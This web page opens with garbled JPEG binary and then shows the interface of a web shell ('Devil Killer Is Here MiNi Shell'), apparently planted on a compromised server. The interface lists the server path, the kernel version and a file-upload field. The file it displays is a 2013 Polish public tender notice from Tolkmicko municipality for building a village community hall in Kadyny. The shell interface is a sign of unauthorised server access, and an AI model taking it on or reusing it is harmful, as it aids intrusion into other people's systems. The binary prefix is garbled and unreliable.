JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130319/109524-N-2013.html

<p class="kh_header"><b>Tolkmicko: Budowa świetlicy wiejskiej w Kadynach wraz z zapleczem gospodarczym, jako miejsca kultywowania tradycji rybackich i integracji mieszkańców</b><br>
<b>Numer ogłoszenia: 109524 - 2013; data zamieszczenia: 19.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy Tolkmicko , ul. Portowa 2, 82-340 Tolkmicko, woj. warmińsko-mazurskie, tel. 055 2316121, faks 055 2316127.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa świetlicy wiejskiej w Kadynach wraz z zapleczem gospodarczym, jako miejsca kultywowania tradycji rybackich i integracji mieszkańców.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budynek użyteczności publicznej pełniący funkcje społeczno kulturalne oraz rekreacyjne Cechy funkcjonalno użytkowe i parametry techniczne obiektu Budynek niepodpiwniczony dwukondygnacyjny w tym użytkowe poddasze Budynek architektonicznie nawiązuje do tradycyjnej zabudowy podcieniowego domu żuławskiego Funkcje parteru sala spotkań mieszkańców zaplecze kuchenno sanitarne i magazynowe zespół szatni wraz z zapleczem sanitarnym pomieszczenie gospodarcze Funkcje poddasza pokoje gościnne z łazienkami pracownia ceramiki sala komputerowa węzeł sanitarny Powierzchnia zabudowy 285,26 m2 Powierzchnia użytkowa 408,01 m2 w tym parter 225,68 m2
poddasze 182,33 m2
Kubatura 1683,00,00 m3
Opis elementów obiektu
Ławy i stopy fundamentowe żelbetowe posadowione na 10 cm warstwie chudego betonu min B7,5 oraz na 20 cm podsypce piaskowej zagęszczonej do min ID 0,7 
Ściany fundamentowe murowane z bloczków betonowych gr 24cm na zaprawie cementowej docieplone styropianem EPS 70 gr 12cm na styropianie wyprawa z zatopioną siatką zbrojeniową na wyprawie 2x warstwa izolacji przeciwwilgociowej na zimnoŚciany konstrukcyjne parteru i poddasza z pustaka ceramicznego gr 24cm np typu LEIER docieplone styropianem EPS 70 gr 12cm na styropianie wyprawa elewacyjna tynk mineralny na siatce z włókna szklanego
Ściany działowe parteru z cegły dziurawki gr 12cm
Strop nad parterem gęstożebrowy np typu LEIER gr 24,5 cm paroizolacja z folii PU styropian FS 20 grubości 5 cm warstwa wyrównawcza
Więźba dachowa  drewniana płatwiowo kleszczową wszystkie elementy drewniane zabezpieczone przeciwogniowo i przeciw korozji biologicznej 2 x powłoką np FOBOS 4MWykończenie  wewnętrzneTynki ścian cementowo wapienne kat III  wykończenie gładzią cementową malowane farbą akrylową wykończenie ścian sanitariatów glazura
Posadzki
na parterze terakota i gres
na piętrze terakota i panele podłogowe
Stolarka budowlana  drzwi wewnętrzne i zewnętrzne oraz okna  z drewna sosnowego klejonego malowanego fabrycznie wraz z fabrycznymi okuciami szyby w oknach zespolone ze szkłem niskoemisyjnym i argonem wszystkie okna z nawietrzakami
Ślusarka bariery schodowe systemowe ze stali nierdzewne
Wykończenie zewnętrzne
Elewacja tynk mineralny o fakturze kamyczkowej na siatce z włókna szklanego oraz płytki elewacyjne klinkierowe na zaprawie klejącej mrozoodpornej wokół okien opaski ze zwornikiem koloru białego
Pokrycie dachu  dachówką ceramiczną holenderką np typu NARVIK lub równoważną płotki śniegowe ławy kominiarskie
Orynnowanie i obróbki blacharskie rury spustowe średnicy 100 mm rynny średnicy 120 mm wykonane z blachy stalowej ocynkowanej gr min 0,5 mm parapety zewnętrzne z blachy stalowej ocynkowanej gr min 0,5 mm
Podjazd dla niepełnosprawnych barierki podjazdu ze stali nierdzewnej polerowanej.
Nawierzchnie  utwardzone  wokół  budynku  trakty jezdne i piesze  z kostki betonowej typu POLBRUK o gr odpowiednio 8 cm i 6 cm układanej na podsypce z piasku stabilizowanego cementem nawierzchnia z kostki ograniczona krawężnikiem i obrzeżem betonowym
Instalacje
Wentylacja grawitacyjna
Kanały  rury spiro i kominy murowane z cegły pełnej klasy 150 na zaprawie cementowo wapiennej klasy M5
Pomieszczenia WC bez okien  wentylacja grawitacyjna wspomagana wentylatorami kanałowymi
Nawietrzaki w oknach oraz nawietrzaki ścienne podokienne
Wentylacja mechaniczna nawiewno wywiewna
Kanały wentylacyjne wywiewne okrągłe i nawiewne prostokątne z blachy stalowej ocynkowanej obudowane płytą G K
Centrala nawiewna z nagrzewnicą elektryczną Q 1700 m3 h 1 szt
Wentylatory kanałowe wyciągowe Q 425 m3 h 4 szt
Klimatyzacja 2 klimatyzatory kasetonowe z 1 jednostką zewnętrzną 
Instalacja wodociągowa ZW CWU z rur miedzianych w otulinach termo gr min 6 mm dla ZW i gr min 9 mm dla CWU źródło ciepłej wody podgrzewacze pojemnościowe V 120dm3 2 szt V 80dm3 4 szt V 10dm3 2 szt podgrzewacze prysznicowe przepływowe N 5kW 6 szt czerpalna armatura sanitarna baterie umywalkowe 12 szt baterie zlewozmywakowe 2 szt baterie prysznicowe  10 szt zawory czerpalne ze złączką do węża  4 szt zawory odcinające do misek ustępowych  10 szt zawory ciśnieniowe do pisuaru  1 szt bateria bidetowa  1 szt
Instalacja wodociągowa ppoż hydranty ppoż wewnętrzny 25 mm  2 szt
Instalacja kanalizacyjna  z rur PCV kielichowych łączonych na wcisk od 32 mm do 160 mm przybory sanitarne umywalki  12 szt zlewozmywaki  zlewy  2 szt brodziki i wpusty podłogowe prysznicowe 10 szt wpusty podłogowe  3 szt miski ustępowe  10 szt pisuary  1 szt bidet  1 szt
Instalacja centralnego ogrzewania 
Źródło ciepła  pompa ciepła Q 34,4 kW ze zbiornikiem buforowym V 500 dm3 EP6kW z gruntowymi sondami głębinowymi dł ca 900 mb UWAGA dolne źródło ciepła w postaci sond głębinowych wymaga indywidualnego zaprojektowania przez Wykonawcę zasady i warunki wykonania dolnego źródła ciepła określa Ustawa z dnia 4 02 1994 r Prawo geologiczne i górnicze Dz U nr 228 poz 1947 oraz przepisy wykonawcze do niej
Instalacja ogrzewania podłogowego  obliczeniowe zapotrzebowanie na ciepło Q 33,54 kW parametry zasilania i powrotu 41,9oC 33,2oC całkowita pojemność wodna instalacji V 629,3 dm3 2 rozdzielacze 12 obwodowe zaopatrzone w układ własnej regulacji hydraulicznej składającej się z gniazd montażowych 13 szt regulatorów pokojowych 13 szt siłowników termicznych 24 szt rozdzielaczy regulacji 230V 2 szt.modułów sterowania pompą 2 szt
Grzejniki elektryczne o mocy Q 600W 3 szt Q 400W 2 szt Q 300W 7 szt 
Instalacje elektryczne  zapotrzebowanie mocy elektrycznej dla obiektu P 26 kW przewidywany prąd obciążenia I 38A instalacje oświetleniowa gniazd wtyczkowych gniazd wtyczkowych komputerowych sieci logicznej ochrony przeciwporażeniowej piorunochronna 
Zagospodarowanie terenu
Nawierzchnie utwardzone
droga i miejsca parkingowe 1728 m2
chodniki 112,5 m2
Ogrodzenie z siatki drucianej na słupkach stalowych
wysokość ogrodzenia 1,5 m
długość ogrodzenia  465 mb
brama wjazdowa  300x150 cm
furtka  100x150 cm
Zieleń urządzona 
trawniki  1000 m2
nasadzenia krzewów  45 szt
nasadzenia drzew  10 szt
Pierwsze wyposażenie obiektu
szafy ubraniowe do szatni  28 szt
stoły rozkładane  25 szt
krzesła  50 szt
TV LCD  50 z cyfrowym odtwarzaczem audio wideo  1 kpl
TV LCD  21  4 szt
biurka komputerowe  10 szt
fotele obrotowe  10 szt
tapczany hotelowe  8 szt
szafy hotelowe 4 szt
fotele klubowe 4 szt
meble kuchenne  1 kpl
lodówka  1 szt
kuchenka elektryczna z piekarnikiem 1 szt
okap kuchenny 1 kpl
wyposażenie pomieszczeń sanitarnych 10 kpl
komody 3 szt
wyposażenie artystyczne obiektu plener artystyczny  1 kpl 
wewnętrzne tabliczki informacyjne  20 szt
wyposażenie p poż i bhp 1 kpl
regały magazynowe stacjonarne 1 kpl
zewnętrzna gablota informacyjna 1 szt
ławki terenowe  6 szt
terenowe stojaki rowerowe 2 szt
maszty flagowe 3 kpl.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>W nieprzewidzianych SIWZ sytuacjach</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.50-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 10 000 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenie spełnienia tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI ppkt. 1.1 SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest wskazanie wykonania w sposób należyty zgodnie z zasadami wiedzy i sztuki budowlanej oraz prawidłowe ukończenie w okresie ostatnich 5 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy w tym okresie co najmniej 1 jednej roboty budowlanej polegającej na budowie budynku mieszkalnego lub budynku zamieszkania zbiorowego lub budynku użyteczności publicznej tj kompletnego budynku wraz z instalacjami i infrastrukturą towarzyszącą uzbrojenia i zagospodarowania terenu o wartości nie mniejszej niż 1 500 000 zł brutto z VAT słownie jeden milion pięćset tysięcy złotych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest dysponowanie co najmniej
kierownikiem budowy posiadającym uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno budowlanej
minimum 5 letnie doświadczenie zawodowe licząc od daty uzyskania uprawnień budowlanych
kierownikiem robót elektrycznych posiadającym
uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej co najmniej w zakresie instalacji elektrycznych
minimum 3 letnie doświadczenie zawodowe licząc od daty uzyskania uprawnień budowlanych
kierownikiem robót sanitarnych, posiadającym:
uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej co najmniej w zakresie instalacji cieplnych wodociągowych i kanalizacyjnych 
minimum 3 letnie doświadczenie zawodowe licząc od daty uzyskania uprawnień budowlanych
Zgodnie z Ustawą z dnia 7 lipca 1994 r Prawo budowlane samodzielne funkcje techniczne w budownictwie, m in kierowanie budową lub innymi robotami budowlanymi mogą wykonywać wyłącznie osoby posiadające wymagane uprawnienia budowlane, będące członkami właściwych izb samorządu zawodowego tekst jednolity Dz U z 2010 r. Nr 243 poz 1623 z późn zm
Wydanie decyzji w sprawie uznania kwalifikacji zawodowych w budownictwie nabytych w państwach członkowskich UE oraz wpis do stosownej izby odbywa się po przeprowadzeniu właściwego postępowania weryfikacyjnego przez odpowiedni organ samorządu zawodowego w Polsce na zasadach określonych w ustawie z dnia 18 marca 2008 r o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej Dz U 2008 Nr 63 poz 394</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest posiadanie środków finansowych lub posiadanie zdolności kredytowej w wysokości w wysokości co najmniej 100.000,00 zł słownie sto tysięcy złotych
Przy ocenie spełnienia tego warunku udziału przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia konsorcjum wielkości stanowiące o spełnieniu warunku będą zsumowane z dokumentów składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia
Wartości potwierdzające spełnianie warunku podane w dokumentach w walutach innych niż wskazane przez Zamawiającego należy przeliczyć wg średniego kursu NBP na dzień wystawienia dokumentu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której Zamawiający dokona wyboru Wykonawcy
Zamawiający określa następujące warunki w jakich przewiduje możliwość dokonania zmian zawartej umowy
Przedłużenie terminu umownego realizacji przedmiotu zamówienia z przyczyn uzasadnionych uwarunkowaniami realizacyjnymi procesu budowlanego niezależnymi od Wykonawcy. Przy czym nie uważa się wpływ warunków atmosferycznych za czynnik zakłócający realizację procesu budowlanego, które przy składaniu ofert muszą być normalnie brane pod uwagę jako zjawiska typowe. Wyjątek stanowią przeszkody atmosferyczne o charakterze nawałnic i katastrof  których zaistnienie, zagrożenia i skutki powinny być szczegółowo potwierdzone przez strony kontraktu.
Zamawiający zastrzega sobie prawo arbitralnego i niepodważalnego decydowania o wprowadzaniu i zakresie zmian umownego terminu zakończenia realizacji zamówienia.
Zmiana ceny umownej przedmiotu zamówienia z powodu
ograniczenia zakresu rzeczowego przedmiotu zamówienia  
wprowadzenia przez Zamawiającego zmian istotnych i lub nieistotnych w dokumentacji projektowej i innych dokumentach opisujących przedmiot zamówienia, uzasadnionych względami konstrukcyjnymi i/lub użytkowymi obiektu budowlanego.
Warunkiem dokonania zmian postanowień umowy jest zgoda obu stron wyrażona na piśmie pod rygorem nieważności takiej zmiany w formie aneksu do umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://tolkmicko-umig.bip-wm.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Tolkmicku ul. Portowa 2 82 340 Tolkmicko pokój nr 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.04.2013 godzina 10:00, miejsce: Urząd Miasta i Gminy w Tolkmicku ul. Portowa 2 82 340 Tolkmicko pokój nr 13.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




